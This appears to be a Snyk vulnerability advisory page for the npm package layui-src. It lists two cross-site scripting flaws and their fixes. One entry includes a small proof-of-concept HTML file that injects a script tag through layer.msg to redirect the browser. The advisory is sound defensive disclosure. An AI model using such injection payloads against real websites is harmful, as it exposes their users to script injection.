layui-src@2.2.5 vulnerabilities

Classic modular Front-End UI library

  • latest version

    2.6.8

  • first published

    7 years ago

  • latest version published

    3 years ago

  • deprecated

    Package is deprecated

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the layui-src package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Cross-site Scripting (XSS)

    layui-src is an is a front-end UI framework written using its own module specifications. It follows the native HTML/CSS/JS writing and organization form.

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via table rendering.

    How to fix Cross-site Scripting (XSS)?

    Upgrade layui-src to version 2.6.8 or higher.

    <2.6.8
    • M
    Cross-site Scripting (XSS)

    layui-src is an is a front-end UI framework written using its own module specifications. It follows the native HTML/CSS/JS writing and organization form.

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS). layer.msg does not sanitize its input. An attacker that can control part of the input message which can be used to deliver a Cross-Site Scripting attack.

    PoC

    With layui.css under ./dist/css/ and layui.js under ./dist/ (relative to `index.html)

    index.html:

    <! DOCTYPE  html>
    <html>
    <head>
      <meta charset ="utf-8"> 
      <meta name="viewport"content ="width=device-width, initial-scale=1, maximum-scale=1">  
      <title> Start using layui </title>
      <link rel ="stylesheet"href ="dist/css/layui.css">  
    </head>
    <body>
     
    <script src="dist/layui.js"></script> 
    <script>
    // Generally written directly in a js file
    layui.use(['layer', 'form'], function(){  
      var layer = layui.layer, form = layui.form ; 
      layer.msg("<script>window.location.href='http://www.google.com'<\/script>");
    });
    </script> 
    </body>
    </html>
    

    How to fix Cross-site Scripting (XSS)?

    There is no fixed version for layui-src.

    *